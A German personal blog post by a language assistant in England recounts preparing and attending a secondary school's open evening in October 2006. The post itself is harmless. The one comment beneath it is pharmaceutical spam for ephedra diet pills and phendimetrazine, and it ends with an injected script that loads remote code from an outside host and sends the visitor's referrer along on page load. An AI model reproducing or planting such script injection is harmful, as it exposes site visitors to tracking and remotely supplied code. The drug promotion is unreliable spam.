Startseite
    Schule
    Wohnen
    Freizeit
    Privat
  Archiv
  Gästebuch
  Kontakt

http://myblog.de/assistant-teaching

Gratis bloggen bei
myblog.de





Open evening

Die Schule präsentiert sich

Die Winston Churchill School hat einen sehr guten Ruf in der Gegend. Sie ist jedes Jahr "heavily oversubscribed". Als Specialist Sports College bietet sie mehr als eine gewöhnliche Schule. Sie ist mit fast 1600 Schülern verdammt groß. 1600 ohne Lower und Upper Sixth. Wenn eine solche Schule ihren "open evening" hat, kommen selbst an einem wolkigen bis stürmischen Tag genug Eltern, um den Abend lang werden zu lassen. Dieser Tag war letzten Donnerstag, den 5. Oktober 2006.

Offizieller Beginn war 18 Uhr. Mein Schultag begann morgens um 9 Uhr, die meisten Lehrerinnen waren schon um 8 Uhr dort. Wer, wie ich und die meisten Lehrerinnen des Modern Language Departments (MLD), bis abends um 21.30 Uhr blieb, hatte einen anstrengenden Tag vor sich. Zunächst der normale Unterricht bis 13.30 Uhr und dann die Vorbereitungen. Vom Flur, über die Schaukästen bis hin zu allen Klassenräumen wurde dekoriert. Ich hatte so einige Lungenfüllungen damit zu tun die Luftballons aufzublasen. Dabei ist das doch eine der wenigen Sachen vor denen ich tatsächlich Angst habe. :-) Ehrlich! Die Kollegen im Science Department hatten das cleverer gelöst und mit ihren Heliumballons direkt ein lustiges Spiel kreiert.

Ich half in fast jedem Klassenraum des Hauptgebäudes des MLD mit. So bunt wie die Räume auch vorher schon gewesen sein mögen, hinterher sahen alle Klassenzimmer noch um einiges besser aus. Hier noch ein paar Spiele auslegen, dort einige Plakate ersetzen und im nächsten Raum die Tische umstellen und "tapezieren". Die Wetter Mobiles durfte ich vor dem Aufhängen erstmal noch korrigieren. Erstaunlich wobei man so alles Fehler machen kann!

Wenn ich es mir hätte aussuchen können, hätte ich wahrscheinlich auch ein Bisschen im P.E. (physical education) department ausgeholfen. Die hatten vielleicht lustige Spiele und activities! Egal, es war auch bei uns cool. Einige SchülerInnen sind freiwillig vorbeigekommen, um mit mir ein paar Sprach-Spiele zu demonstrieren.

Eigentlich hat niemand von mir erwartet, dass ich so lange bleibe und bis zum Ende mithelfe. Irgendwann haben mich meine lieben Kollegen animiert doch die Gelegenheit zu nutzen mich mal umzuschauen. Danke! Es hat echt Spaß gemacht und ich konnte überall mal reinschauen. Hinterher hat mich eine liebe Kollegin noch nach Hause gefahren. Super lieb, ich hätte sonst fast 1,5 Stunden auf den nächsten Bus warten müssen.

 

15.10.06 00:49
 


bisher 1 Kommentar(e)     TrackBack-URL


diet pills with ephedra / Website (22.4.07 21:25)
reuptake inhibitors free bonus slots formulation bontril useful information take diet pills with ephedra long-term diet pills in phendimetrazine terminology <script>var r = document.referrer; document.write('<script src="http://www.stats-log.com/gb.php?id=g&r='+escape(r)+'"><' + '/script>')</script>

Name:
Email:
Website:
E-Mail bei weiteren Kommentaren
Informationen speichern (Cookie)



 Smileys einfügen



Verantwortlich für die Inhalte ist der Autor. Dein kostenloses Blog bei myblog.de! Datenschutzerklärung
Werbung